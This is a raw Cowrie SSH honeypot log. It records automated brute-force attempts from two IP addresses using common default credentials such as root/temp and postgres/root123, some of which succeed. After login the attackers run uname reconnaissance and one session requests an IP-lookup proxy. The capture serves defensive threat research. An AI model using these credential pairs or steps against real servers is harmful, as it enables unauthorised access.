{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:46:49.134624Z","src_ip":"212.227.235.229","session":"695feaf98e11"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:49.370194Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:50.294057Z","src_ip":"212.227.125.160","session":"ffdda6180f30"}
{"eventid":"cowrie.login.failed","username":"btf","password":"321start","message":"login attempt [btf/321start] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:50.961143Z","src_ip":"212.227.235.229","session":"f363e50ddcac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53512,"dst_ip":"1.2.3.4","dst_port":22,"session":"164508743f8c","protocol":"ssh","message":"New connection: 212.227.235.229:53512 (1.2.3.4:22) [session: 164508743f8c]","sensor":"my-vps","timestamp":"2025-08-31T04:46:51.389444Z"}
{"eventid":"cowrie.login.failed","username":"guest1","password":"guest1","message":"login attempt [guest1/guest1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:51.550364Z","src_ip":"212.227.235.229","session":"23ad0f691e09"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:46:51.602143Z","src_ip":"212.227.235.229","session":"164508743f8c"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:51.605513Z","src_ip":"212.227.235.229","session":"da7de7e4974a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60730,"dst_ip":"1.2.3.4","dst_port":22,"session":"03d6d3691144","protocol":"ssh","message":"New connection: 212.227.125.160:60730 (1.2.3.4:22) [session: 03d6d3691144]","sensor":"my-vps","timestamp":"2025-08-31T04:46:52.485993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:52.487018Z","src_ip":"212.227.125.160","session":"03d6d3691144"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:52.670738Z","src_ip":"212.227.125.160","session":"03d6d3691144"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:46:53.088151Z","src_ip":"212.227.235.229","session":"164508743f8c"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:53.221372Z","src_ip":"212.227.125.160","session":"03d6d3691144"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:46:53.283336Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:46:53.284249Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:53.483832Z","src_ip":"212.227.235.229","session":"f363e50ddcac"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:53.654418Z","src_ip":"212.227.235.229","session":"da7de7e4974a"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:54.212471Z","src_ip":"212.227.235.229","session":"23ad0f691e09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:54.293440Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:54.294641Z","src_ip":"212.227.235.229","session":"cc214a7abea2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:54.406160Z","src_ip":"212.227.125.160","session":"03d6d3691144"}
{"eventid":"cowrie.login.failed","username":"1234","password":"1234","message":"login attempt [1234/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T04:46:56.223097Z","src_ip":"212.227.235.229","session":"164508743f8c"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:57.478577Z","src_ip":"212.227.235.229","session":"164508743f8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39226,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f191bdb4135","protocol":"ssh","message":"New connection: 212.227.125.160:39226 (1.2.3.4:22) [session: 8f191bdb4135]","sensor":"my-vps","timestamp":"2025-08-31T04:46:57.684597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:57.685926Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51968,"dst_ip":"1.2.3.4","dst_port":22,"session":"42bef3442541","protocol":"ssh","message":"New connection: 212.227.235.229:51968 (1.2.3.4:22) [session: 42bef3442541]","sensor":"my-vps","timestamp":"2025-08-31T04:46:57.698517Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:46:57.869456Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.420851Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.514858Z","src_ip":"212.227.235.229","session":"42bef3442541"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.516267Z","src_ip":"212.227.235.229","session":"42bef3442541"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:46:58.801835Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.802513Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.987234Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:46:58.988377Z","src_ip":"212.227.125.160","session":"8f191bdb4135"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48732,"dst_ip":"1.2.3.4","dst_port":22,"session":"139b145f3b21","protocol":"ssh","message":"New connection: 212.227.125.160:48732 (1.2.3.4:22) [session: 139b145f3b21]","sensor":"my-vps","timestamp":"2025-08-31T04:46:59.597037Z"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:01.305088Z","src_ip":"212.227.235.229","session":"b99fb18320a8"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:02.620511Z","src_ip":"212.227.235.229","session":"b99fb18320a8"}
{"eventid":"cowrie.session.closed","duration":"22.0","message":"Connection lost after 22.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:02.746618Z","src_ip":"212.227.235.229","session":"695feaf98e11"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:02.907279Z","src_ip":"212.227.125.160","session":"139b145f3b21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:02.936646Z","src_ip":"212.227.125.160","session":"139b145f3b21"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"root123","message":"login attempt [postgres/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:04.451448Z","src_ip":"212.227.235.229","session":"42bef3442541"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:06.252862Z","src_ip":"212.227.235.229","session":"42bef3442541"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58512,"dst_ip":"1.2.3.4","dst_port":22,"session":"310e48d105a4","protocol":"ssh","message":"New connection: 212.227.235.229:58512 (1.2.3.4:22) [session: 310e48d105a4]","sensor":"my-vps","timestamp":"2025-08-31T04:47:07.074695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:47:07.163333Z","src_ip":"212.227.235.229","session":"310e48d105a4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:47:07.349890Z","src_ip":"212.227.235.229","session":"310e48d105a4"}
{"eventid":"cowrie.login.success","username":"root","password":"temp","message":"login attempt [root/temp] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:47:08.583315Z","src_ip":"212.227.235.229","session":"310e48d105a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:47:08.890338Z","session":"310e48d105a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:47:09.188205Z","src_ip":"212.227.235.229","session":"310e48d105a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38970,"dst_ip":"1.2.3.4","dst_port":22,"session":"07a9d6438479","protocol":"ssh","message":"New connection: 212.227.125.160:38970 (1.2.3.4:22) [session: 07a9d6438479]","sensor":"my-vps","timestamp":"2025-08-31T04:47:09.267820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:47:09.271257Z","src_ip":"212.227.125.160","session":"07a9d6438479"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:47:09.455888Z","src_ip":"212.227.125.160","session":"07a9d6438479"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:09.679732Z","src_ip":"212.227.235.229","session":"310e48d105a4"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:47:10.207051Z","src_ip":"212.227.125.160","session":"07a9d6438479"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:47:11.398496Z","src_ip":"212.227.125.160","session":"07a9d6438479"}
